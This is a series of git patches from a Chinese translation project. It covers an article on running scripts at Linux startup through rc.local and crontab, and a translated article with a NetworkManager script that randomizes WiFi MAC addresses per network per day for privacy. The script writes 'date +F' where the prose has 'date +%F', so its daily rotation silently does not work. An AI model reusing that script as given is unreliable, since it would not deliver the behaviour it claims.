...](https://opensource.com/sites/default/files/styles/profile_pictures/public/scottn-cropped.jpg?itok=q4T2J4Ai)][18] - - Scott Nesbitt - I'm a long-time user of free/open source software, and write various things for both fun and profit. I don't take myself too seriously and I do all of my own stunts. You can find me at these fine establishments on the web: [Twitter][5], [Mastodon][6], [GitHub][7], and... [more about Scott Nesbitt][8][More about me][9] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/12/using-turtl-open-source-alternative-evernote - -作者:[Scott Nesbitt ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/scottnesbitt -[1]:https://opensource.com/file/378346 -[2]:https://opensource.com/file/378351 -[3]:https://opensource.com/file/378356 -[4]:https://opensource.com/article/17/12/using-turtl-open-source-alternative-evernote?rate=Kktl8DSEAXzwIGppn0PS4KuSpZv3Qbk0fuiilnplrnE -[5]:http://www.twitter.com/ScottWNesbitt -[6]:https://mastodon.social/@scottnesbitt -[7]:https://github.com/ScottWNesbitt -[8]:https://opensource.com/users/scottnesbitt -[9]:https://opensource.com/users/scottnesbitt -[10]:https://opensource.com/user/14925/feed -[11]:https://blog.evernote.com/blog/2016/12/15/evernote-revisits-privacy-policy/ -[12]:https://turtlapp.com/ -[13]:https://turtlapp.com/download/ -[14]:https://turtlapp.com/download/ -[15]:https://en.wikipedia.org/wiki/Markdown -[16]:https://turtlapp.com/docs/security/encryption-specifics/ -[17]:https://opensource.com/article/17/4/linux-chromebook-gallium-os -[18]:https://opensource.com/users/scottnesbitt -[19]:https://opensource.com/users/scottnesbitt -[20]:https://opensource.com/users/scottnesbitt -[21]:https://opensource.com/article/17/12/using-turtl-open-source-alternative-evernote#comments -[22]:https://opensource.com/tags/alternatives From 1d63bddba169c5d33f184379450bb2c56b418f54 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 9 Dec 2017 21:45:18 +0800 Subject: [PATCH 0459/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2009=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=85=AD=2021:45:1?= =?UTF-8?q?8=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...nd Scripts at Reboot & Startup in Linux.md | 64 ---------------- ...nd Scripts at Reboot & Startup in Linux.md | 75 +++++++++++++++++++ 2 files changed, 75 insertions(+), 64 deletions(-) delete mode 100644 sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md create mode 100644 translated/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md diff --git a/sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md b/sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md deleted file mode 100644 index 04c922aa41..0000000000 --- a/sources/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md +++ /dev/null @@ -1,64 +0,0 @@ -translating by lujun9972 -Executing Commands and Scripts at Reboot & Startup in Linux -====== -There might arise a need to execute a command or scripts at reboot or every time when we start our system. So how can we do that, in this tutorial we are going to discuss just that. We will discuss how we can make our CentOS/RHEL and Ubuntu systems to execute a command or scripts at reboot or at system startup using two different methods. Both the methods are tested and works just fine, - -### Method 1 – Using rc.local - -In this method, we will use ‘rc.local’ file located in ‘/etc/’ to execute our scripts and commands at startup. We will make an entry to execute the script in the file & every time when our system starts, the script will be executed. - -But we will first provide the permissions to make the file /etc/rc.local executable, - -$ sudo chmod +x /etc/rc.local - -Next we will add the script to be executed in the file, - -$ sudo vi /etc/rc.local - -& at the bottom of file, add the entry - -sh /root/script.sh & - -Now save the file & exit. Similarly we can execute a command using rc.local file but we need to make sure that we mention the full path of the command. To locate the full command path, run - -$ which command - -For example, - -$ which shutter - -/usr/bin/shutter - -For CentOS, we use file ‘/etc/rc.d/rc.local’ instead of ‘/etc/rc.local’. We also need to make this file executable before adding any script or command to the file. - -Note:- When executing a script at startup, make sure that the script ends with ‘exit 0’. - -( Recommended Read : ) - -### Method 2 – Crontab method - -This method is the easiest method of the two methods. We will create a cron job that will wait for 90 seconds after system startup & then will execute the command or script on the system. - -To create a cron job, open terminal & run - -$ crontab -e - -& enter the following line , - -@reboot ( sleep 90 ; sh \location\script.sh ) - -where \location\script.sh is the location of script to be executed. - -So this was our tutorial on how to execute a script or a command when system starts up. Please leave your queries, if any , using the comment box below - --------------------------------------------------------------------------------- - -via: http://linuxtechlab.com/executing-commands-scripts-at-reboot/ - -作者:[Shusain][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://linuxtechlab.com/author/shsuain/ diff --git a/translated/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md b/translated/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md new file mode 100644 index 0000000000..107caa6bd9 --- /dev/null +++ b/translated/tech/20170918 Executing Commands and Scripts at Reboot & Startup in Linux.md @@ -0,0 +1,75 @@ +在 Linux 启动或重启时执行命令与脚本 +====== +有时可能会需要在重启时或者每次系统启动时运行某些命令或者脚本。我们要怎样做呢?本文中我们就对此进行讨论。 我们会用两种方法来描述如何在 CentOS/RHEL 以及 Ubuntu 系统上做到重启或者系统启动时执行命令和脚本。 两种方法都通过了测试。 + +### 方法 1 – 使用 rc.local + +这种方法会利用 `/etc/` 中的 `rc.local` 文件来在启动时执行脚本与命令。我们在文件中加上一行 l 爱执行脚本,这样每次启动系统时,都会执行该脚本。 + +不过我们首先需要为 `/etc/rc.local` 添加执行权限, + +```shell +$ sudo chmod +x /etc/rc.local +``` + +然后将要执行的脚本加入其中, + +```shell +$ sudo vi /etc/rc.local +``` + +在文件最后加上 + +```shell +sh /root/script.sh & +``` + +然后保存文件并退出。 +使用 `rc.local` 文件来执行命令也是一样的,但是一定要记得填写命令的完整路径。 像知道命令的完整路径可以运行 + +```shell +$ which command +``` + +比如, + +```shell +$ which shutter +/usr/bin/shutter +``` + +如果是 CentOS,我们修改的是文件 `/etc/rc.d/rc.local` 而不是 `/etc/rc.local`。 不过我们也需要先为该文件添加可执行权限。 + +注意:- 启动时执行的脚本,请一定保证是以 `exit 0` 结尾的。 + +### 方法 2 – 使用 Crontab + +该方法最简单了。我们创建一个 cron 任务,这个任务在系统启动后等待 90 秒,然后执行命令和脚本。 + +要创建 cron 任务,打开终端并执行 + +```shell +$ crontab -e +``` + +然后输入下行内容, + +```shell +@reboot ( sleep 90 ; sh \location\script.sh ) +``` + +这里 `\location\script.sh` 就是待执行脚本的地址。 + +我们的文章至此就完了。如有疑问,欢迎留言。 + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/executing-commands-scripts-at-reboot/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ From f9eea6891c0e79fc34a4db085302bdf66acbb2e1 Mon Sep 17 00:00:00 2001 From: feng lv Date: Sat, 9 Dec 2017 23:48:42 +0800 Subject: [PATCH 0460/1627] ucasFL translating --- sources/tech/20170413 More Unknown Linux Commands.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170413 More Unknown Linux Commands.md b/sources/tech/20170413 More Unknown Linux Commands.md index f5507d3802..d773d7b4c9 100644 --- a/sources/tech/20170413 More Unknown Linux Commands.md +++ b/sources/tech/20170413 More Unknown Linux Commands.md @@ -1,3 +1,5 @@ +translating by ucasFL + More Unknown Linux Commands ============================================================ From 7162ea6a1c215c9d3bafdc90adc5cb9fdbdfa989 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=AD=91=E9=AD=85=E9=AD=8D=E9=AD=89?= <625310581@qq.com> Date: Sat, 9 Dec 2017 23:59:58 +0800 Subject: [PATCH 0461/1627] translating by HardworkFish --- sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md index a3fc2c886e..2ead77d63d 100644 --- a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md @@ -1,3 +1,6 @@ + +translating by HardworkFish + INTRODUCING DOCKER SECRETS MANAGEMENT ============================================================ From 61e609292f58749920ba77d60a536ba445558bcd Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Sun, 10 Dec 2017 01:02:21 +0800 Subject: [PATCH 0462/1627] Update 20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md --- ...e your WiFi MAC address on Ubuntu 16.04.md | 67 ++++++++++++------- 1 file changed, 43 insertions(+), 24 deletions(-) diff --git a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md index 3f0b8a0f50..bd0efb5d5e 100644 --- a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md +++ b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @@ -1,50 +1,65 @@ translating by wenwensnow -Randomize your WiFi MAC address on Ubuntu 16.04 + +在Ubuntu 16.04下随机生成你的WiFi MAC地址 ============================================================ - _Your device’s MAC address can be used to track you across the WiFi networks you connect to. That data can be shared and sold, and often identifies you as an individual. It’s possible to limit this tracking by using pseudo-random MAC addresses._ +你设备的MAC地址可以在不同的WiFi网络中记录你的活动。这些信息能被共享后出售,用于识别特定的个体。但可以用随机生成的伪MAC地址来阻止这一行为。 + ![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) _Image courtesy of [Cloudessa][4]_ -Every network device like a WiFi or Ethernet card has a unique identifier called a MAC address, for example `b4:b6:76:31:8c:ff`. It’s how networking works: any time you connect to a WiFi network, the router uses that address to send and receive packets to your machine and distinguish it from other devices in the area. +每一个诸如WiFi或者以太网卡这样的网络设备,都有一个叫做MAC地址的唯一标识符,如:`b4:b6:76:31:8c:ff`。这就是你能上网的原因:每当你连接上WiFi,路由器就会用这一地址来向你接受和发送数据,并且用它来区别你和这一网络的其他设备。 -The snag with this design is that your unique, unchanging MAC address is just perfect for tracking you. Logged into Starbucks WiFi? Noted. London Underground? Logged. +这一设计的缺陷在于唯一性,不变的MAC地址正好可以用来追踪你。连上了星巴克的WiFi? 好,注意到了。在伦敦的地铁上? 也记录下来。 -If you’ve ever put your real name into one of those Craptive Portals on a WiFi network you’ve now tied your identity to that MAC address. Didn’t read the terms and conditions? You might assume that free airport WiFi is subsidised by flogging ‘customer analytics’ (your personal information) to hotels, restaurant chains and whomever else wants to know about you. +如果你曾经在某一个WiFi验证页面上输入过你的真实姓名,你就已经把自己和这一MAC地址建立了联系。没有仔细阅读许可服务条款? 你可以认为,机场的免费WiFi正通过出售所谓的 ‘顾客分析数据’(你的个人信息)获利。出售的对象包括酒店,餐饮业,和任何想要了解你的人。 -I don’t subscribe to being tracked and sold by mega-corps, so I spent a few hours hacking a solution. -### MAC addresses don’t need to stay the same +我不想信息被记录,再出售给多家公司,所以我花了几个小时想出了一个解决方案。 -Fortunately, it’s possible to spoof your MAC address to a random one without fundamentally breaking networking. -I wanted to randomize my MAC address, but with three particular caveats: +### MAC 地址不一定总是不变的 -1. The MAC should be different across different networks. This means Starbucks WiFi sees a different MAC from London Underground, preventing linking my identity across different providers. +幸运的是,在不断开网络的情况下,是可以随机生成一个伪MAC地址的。 -2. The MAC should change regularly to prevent a network knowing that I’m the same person who walked past 75 times over the last year. -3. The MAC stays the same throughout each working day. When the MAC address changes, most networks will kick you off, and those with Craptive Portals will usually make you sign in again - annoying. +我想随机生成我的MAC地址,但是有三个要求: -### Manipulating NetworkManager -My first attempt of using the `macchanger` tool was unsuccessful as NetworkManager would override the MAC address according to its own configuration. +1.MAC地址在不同网络中是不相同的。这意味着,我在星巴克和在伦敦地铁网络中的MAC地址是不相同的,这样在不同的服务提供商中就无法将我的活动联系起来 -I learned that NetworkManager 1.4.1+ can do MAC address randomization right out the box. If you’re using Ubuntu 17.04 upwards, you can get most of the way with [this config file][7]. You can’t quite achieve all three of my requirements (you must choose  _random_ or  _stable_  but it seems you can’t do  _stable-for-one-day_ ). -Since I’m sticking with Ubuntu 16.04 which ships with NetworkManager 1.2, I couldn’t make use of the new functionality. Supposedly there is some randomization support but I failed to actually make it work, so I scripted up a solution instead. +2.MAC地址需要经常更换,这样在网络上就没人知道我就是去年在这儿经过了75次的那个人 + + +3. MAC地址一天之内应该保持不变。当MAC地址更改时,大多数网络都会与你断开连接,然后必须得进入验证页面再次登陆 - 这很烦人。 + + +### 操作网络管理器 + +我第一次尝试用一个叫做 `macchanger`的工具,但是失败了。网络管理器会根据它自己的设置恢复默认的MAC地址。 + + +我了解到,网络管理器1.4.1以上版本可以自动生成随机的MAC地址。如果你在使用Ubuntu 17.04 版本,你可以根据这一配置文件实现这一目的。但这并不能完全符合我的三个要求 (你必须在随机和稳定这两个选项之中选择一个,但没有一天之内保持不变这一选项) + + +因为我使用的是Ubuntu 16.04,网络管理器版本为1.2,不能直接使用高版本这一新功能。可能网络管理器有一些随机化方法支持,但我没能成功。所以我编了一个脚本来实现这一目标。 + + +幸运的是,网络管理器1.2 允许生成随机MAC地址。你在已连接的网络中可以看见 ‘编辑连接’这一选项: -Fortunately NetworkManager 1.2 does allow for spoofing your MAC address. You can see this in the ‘Edit connections’ dialog for a given network: ![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) +网络管理器也支持消息处理 - 任何位于 `/etc/NetworkManager/dispatcher.d/pre-up.d/` 的脚本在建立网络连接之前都会被执行。 NetworkManager also supports hooks - any script placed in `/etc/NetworkManager/dispatcher.d/pre-up.d/` is run before a connection is brought up. -### Assigning pseudo-random MAC addresses +### 分配随机生成的伪MAC地址 + +我想根据网络ID和日期来生成新的随机MAC地址。 我们可以使用网络管理器的命令行工具,nmcli,来显示所有可用网络: -To recap, I wanted to generate random MAC addresses based on the  _network_  and the  _date_ . We can use the NetworkManager command line, nmcli, to show a full list of networks: ``` > nmcli connection @@ -56,7 +71,7 @@ virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- ``` -Since each network has a unique identifier, to achieve my scheme I just concatenated the UUID with today’s date and hashed the result: +因为每个网络都有一个唯一标识符,为了实现我的计划,我将UUID和日期拼接在一起,然后使用MD5生成hash值: ``` @@ -67,17 +82,21 @@ Since each network has a unique identifier, to achieve my scheme I just concaten 53594de990e92f9b914a723208f22b3f - ``` +生成的结果可以代替MAC地址的最后八个字节。 -That produced bytes which can be substituted in for the last octets of the MAC address. -Note that the first byte `02` signifies the address is [locally administered][8]. Real, burned-in MAC addresses start with 3 bytes designing their manufacturer, for example `b4:b6:76` for Intel. +值得注意的是,最开始的字节 `02` 代表这个地址是自行指定的。实际上,真实MAC地址的前三个字节是由制造商决定的,例如 `b4:b6:76` 就代表Intel。 -It’s possible that some routers may reject locally administered MACs but I haven’t encountered that yet. +有可能某些路由器会拒绝自己指定的MAC地址,但是我还没有遇到过这种情况。 + + +每一次连接到一个网络,这一脚本都会用`nmcli` 来指定一个随机生成的伪MAC地址: On every connection up, the script calls `nmcli` to set the spoofed MAC address for every connection: ![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) +最后,我查看了 `ifconfig`的输出结果,我发现端口MAC地址已经变成了随机生成的地址,而不是我真实的MAC地址。 As a final check, if I look at `ifconfig` I can see that the `HWaddr` is the spoofed one, not my real MAC address: ``` @@ -92,8 +111,8 @@ wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) ``` +完整的脚本可以在Github上查看。 -The full script is [available on Github][9]. ``` #!/bin/sh From c48d1ff2bac0948fc68d92e6320621ac3d2360c3 Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Sun, 10 Dec 2017 01:04:42 +0800 Subject: [PATCH 0463/1627] Update 20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md --- ... Randomize your WiFi MAC address on Ubuntu 16.04.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md index bd0efb5d5e..46e316aad9 100644 --- a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md +++ b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @@ -54,7 +54,7 @@ translating by wenwensnow ![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) 网络管理器也支持消息处理 - 任何位于 `/etc/NetworkManager/dispatcher.d/pre-up.d/` 的脚本在建立网络连接之前都会被执行。 -NetworkManager also supports hooks - any script placed in `/etc/NetworkManager/dispatcher.d/pre-up.d/` is run before a connection is brought up. + ### 分配随机生成的伪MAC地址 @@ -91,13 +91,13 @@ virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- 有可能某些路由器会拒绝自己指定的MAC地址,但是我还没有遇到过这种情况。 -每一次连接到一个网络,这一脚本都会用`nmcli` 来指定一个随机生成的伪MAC地址: -On every connection up, the script calls `nmcli` to set the spoofed MAC address for every connection: +每次连接到一个网络,这一脚本都会用`nmcli` 来指定一个随机生成的伪MAC地址: + ![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) 最后,我查看了 `ifconfig`的输出结果,我发现端口MAC地址已经变成了随机生成的地址,而不是我真实的MAC地址。 -As a final check, if I look at `ifconfig` I can see that the `HWaddr` is the spoofed one, not my real MAC address: + ``` > ifconfig @@ -154,7 +154,7 @@ done wait ``` -Enjoy! + _Update: [Use locally administered MAC addresses][5] to avoid clashing with real Intel ones. Thanks [@_fink][6]_ From 69e501c257625851fcde067813875da1cc5da43a Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Sun, 10 Dec 2017 01:08:16 +0800 Subject: [PATCH 0464/1627] Delete 20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md --- ...e your WiFi MAC address on Ubuntu 16.04.md | 180 ------------------ 1 file changed, 180 deletions(-) delete mode 100644 sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md diff --git a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md deleted file mode 100644 index 46e316aad9..0000000000 --- a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md +++ /dev/null @@ -1,180 +0,0 @@ -translating by wenwensnow - -在Ubuntu 16.04下随机生成你的WiFi MAC地址 -============================================================ - -你设备的MAC地址可以在不同的WiFi网络中记录你的活动。这些信息能被共享后出售,用于识别特定的个体。但可以用随机生成的伪MAC地址来阻止这一行为。 - - -![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) - - _Image courtesy of [Cloudessa][4]_ - -每一个诸如WiFi或者以太网卡这样的网络设备,都有一个叫做MAC地址的唯一标识符,如:`b4:b6:76:31:8c:ff`。这就是你能上网的原因:每当你连接上WiFi,路由器就会用这一地址来向你接受和发送数据,并且用它来区别你和这一网络的其他设备。 - -这一设计的缺陷在于唯一性,不变的MAC地址正好可以用来追踪你。连上了星巴克的WiFi? 好,注意到了。在伦敦的地铁上? 也记录下来。 - -如果你曾经在某一个WiFi验证页面上输入过你的真实姓名,你就已经把自己和这一MAC地址建立了联系。没有仔细阅读许可服务条款? 你可以认为,机场的免费WiFi正通过出售所谓的 ‘顾客分析数据’(你的个人信息)获利。出售的对象包括酒店,餐饮业,和任何想要了解你的人。 - - -我不想信息被记录,再出售给多家公司,所以我花了几个小时想出了一个解决方案。 - - -### MAC 地址不一定总是不变的 - -幸运的是,在不断开网络的情况下,是可以随机生成一个伪MAC地址的。 - - -我想随机生成我的MAC地址,但是有三个要求: - - -1.MAC地址在不同网络中是不相同的。这意味着,我在星巴克和在伦敦地铁网络中的MAC地址是不相同的,这样在不同的服务提供商中就无法将我的活动联系起来 - - -2.MAC地址需要经常更换,这样在网络上就没人知道我就是去年在这儿经过了75次的那个人 - - -3. MAC地址一天之内应该保持不变。当MAC地址更改时,大多数网络都会与你断开连接,然后必须得进入验证页面再次登陆 - 这很烦人。 - - -### 操作网络管理器 - -我第一次尝试用一个叫做 `macchanger`的工具,但是失败了。网络管理器会根据它自己的设置恢复默认的MAC地址。 - - -我了解到,网络管理器1.4.1以上版本可以自动生成随机的MAC地址。如果你在使用Ubuntu 17.04 版本,你可以根据这一配置文件实现这一目的。但这并不能完全符合我的三个要求 (你必须在随机和稳定这两个选项之中选择一个,但没有一天之内保持不变这一选项) - - -因为我使用的是Ubuntu 16.04,网络管理器版本为1.2,不能直接使用高版本这一新功能。可能网络管理器有一些随机化方法支持,但我没能成功。所以我编了一个脚本来实现这一目标。 - - -幸运的是,网络管理器1.2 允许生成随机MAC地址。你在已连接的网络中可以看见 ‘编辑连接’这一选项: - - -![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) - -网络管理器也支持消息处理 - 任何位于 `/etc/NetworkManager/dispatcher.d/pre-up.d/` 的脚本在建立网络连接之前都会被执行。 - - -### 分配随机生成的伪MAC地址 - -我想根据网络ID和日期来生成新的随机MAC地址。 我们可以使用网络管理器的命令行工具,nmcli,来显示所有可用网络: - - -``` -> nmcli connection -NAME UUID TYPE DEVICE -Gladstone Guest 618545ca-d81a-11e7-a2a4-271245e11a45 802-11-wireless wlp1s0 -DoESDinky 6e47c080-d81a-11e7-9921-87bc56777256 802-11-wireless -- -PublicWiFi 79282c10-d81a-11e7-87cb-6341829c2a54 802-11-wireless -- -virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- - -``` - -因为每个网络都有一个唯一标识符,为了实现我的计划,我将UUID和日期拼接在一起,然后使用MD5生成hash值: - -``` - -# eg 618545ca-d81a-11e7-a2a4-271245e11a45-2017-12-03 - -> echo -n "${UUID}-$(date +%F)" | md5sum - -53594de990e92f9b914a723208f22b3f - - -``` -生成的结果可以代替MAC地址的最后八个字节。 - - -值得注意的是,最开始的字节 `02` 代表这个地址是自行指定的。实际上,真实MAC地址的前三个字节是由制造商决定的,例如 `b4:b6:76` 就代表Intel。 - - -有可能某些路由器会拒绝自己指定的MAC地址,但是我还没有遇到过这种情况。 - - -每次连接到一个网络,这一脚本都会用`nmcli` 来指定一个随机生成的伪MAC地址: - - -![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) - -最后,我查看了 `ifconfig`的输出结果,我发现端口MAC地址已经变成了随机生成的地址,而不是我真实的MAC地址。 - - -``` -> ifconfig -wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d - inet addr:192.168.0.86 Bcast:192.168.0.255 Mask:255.255.255.0 - inet6 addr: fe80::648c:aff2:9a9d:764/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:12107812 errors:0 dropped:2 overruns:0 frame:0 - TX packets:18332141 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) - -``` -完整的脚本可以在Github上查看。 - - -``` -#!/bin/sh - -# /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses - -# Configure every saved WiFi connection in NetworkManager with a spoofed MAC -# address, seeded from the UUID of the connection and the date eg: -# 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20' - -# This makes your MAC impossible(?) to track across WiFi providers, and -# for one provider to track across days. - -# For craptive portals that authenticate based on MAC, you might want to -# automate logging in :) - -# Note that NetworkManager >= 1.4.1 (Ubuntu 17.04+) can do something similar -# automatically. - -export PATH=$PATH:/usr/bin:/bin - -LOG_FILE=/var/log/randomize-mac-addresses - -echo "$(date): $*" > ${LOG_FILE} - -WIFI_UUIDS=$(nmcli --fields type,uuid connection show |grep 802-11-wireless |cut '-d ' -f3) - -for UUID in ${WIFI_UUIDS} -do - UUID_DAILY_HASH=$(echo "${UUID}-$(date +F)" | md5sum) - - RANDOM_MAC="02:$(echo -n ${UUID_DAILY_HASH} | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1:\2:\3:\4:\5/')" - - CMD="nmcli connection modify ${UUID} wifi.cloned-mac-address ${RANDOM_MAC}" - - echo "$CMD" >> ${LOG_FILE} - $CMD & -done - -wait -``` - - - _Update: [Use locally administered MAC addresses][5] to avoid clashing with real Intel ones. Thanks [@_fink][6]_ - --------------------------------------------------------------------------------- - -via: https://www.paulfurley.com/randomize-your-wifi-mac-address-on-ubuntu-1604-xenial/ - -作者:[Paul M Furley ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.paulfurley.com/ -[1]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/raw/5f02fc8f6ff7fca5bca6ee4913c63bf6de15abca/randomize-mac-addresses -[2]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f#file-randomize-mac-addresses -[3]:https://github.com/ -[4]:http://cloudessa.com/products/cloudessa-aaa-and-captive-portal-cloud-service/ -[5]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/revisions#diff-824d510864d58c07df01102a8f53faef -[6]:https://twitter.com/fink_/status/937305600005943296 -[7]:https://gist.github.com/paulfurley/978d4e2e0cceb41d67d017a668106c53/ -[8]:https://en.wikipedia.org/wiki/MAC_address#Universal_vs._local -[9]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f From 8f17217da1be32193d06fd6d581d56d8f62ae691 Mon Sep 17 00:00:00 2001 From: wenwensnow <963555237@qq.com> Date: Sun, 10 Dec 2017 01:26:29 +0800 Subject: [PATCH 0465/1627] Create 20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md --- ...e your WiFi MAC address on Ubuntu 16.04.md | 180 ++++++++++++++++++ 1 file changed, 180 insertions(+) create mode 100644 translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md diff --git a/translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md new file mode 100644 index 0000000000..a5e50edc89 --- /dev/null +++ b/translated/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md @@ -0,0 +1,180 @@ + + 在Ubuntu 16.04下随机生成你的WiFi MAC地址 + ============================================================ + + 你设备的MAC地址可以在不同的WiFi网络中记录你的活动。这些信息能被共享后出售,用于识别特定的个体。但可以用随机生成的伪MAC地址来阻止这一行为。 + + + ![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) + + _Image courtesy of [Cloudessa][4]_ + + 每一个诸如WiFi或者以太网卡这样的网络设备,都有一个叫做MAC地址的唯一标识符,如:`b4:b6:76:31:8c:ff`。这就是你能上网的原因:每当你连接上WiFi,路由器就会用这一地址来向你接受和发送数据,并且用它来区别你和这一网络的其他设备。 + + 这一设计的缺陷在于唯一性,不变的MAC地址正好可以用来追踪你。连上了星巴克的WiFi? 好,注意到了。在伦敦的地铁上? 也记录下来。 + + 如果你曾经在某一个WiFi验证页面上输入过你的真实姓名,你就已经把自己和这一MAC地址建立了联系。没有仔细阅读许可服务条款? 你可以认为,机场的免费WiFi正通过出售所谓的 ‘顾客分析数据’(你的个人信息)获利。出售的对象包括酒店,餐饮业,和任何想要了解你的人。 + + + 我不想信息被记录,再出售给多家公司,所以我花了几个小时想出了一个解决方案。 + + + ### MAC 地址不一定总是不变的 + + 幸运的是,在不断开网络的情况下,是可以随机生成一个伪MAC地址的。 + + + 我想随机生成我的MAC地址,但是有三个要求: + + + 1.MAC地址在不同网络中是不相同的。这意味着,我在星巴克和在伦敦地铁网络中的MAC地址是不相同的,这样在不同的服务提供商中就无法将我的活动联系起来 + + + 2.MAC地址需要经常更换,这样在网络上就没人知道我就是去年在这儿经过了75次的那个人 + + + 3. MAC地址一天之内应该保持不变。当MAC地址更改时,大多数网络都会与你断开连接,然后必须得进入验证页面再次登陆 - 这很烦人。 + + + ### 操作网络管理器 + + 我第一次尝试用一个叫做 `macchanger`的工具,但是失败了。网络管理器会根据它自己的设置恢复默认的MAC地址。 + + + 我了解到,网络管理器1.4.1以上版本可以自动生成随机的MAC地址。如果你在使用Ubuntu 17.04 版本,你可以根据这一配置文件实现这一目的。但这并不能完全符合我的三个要求 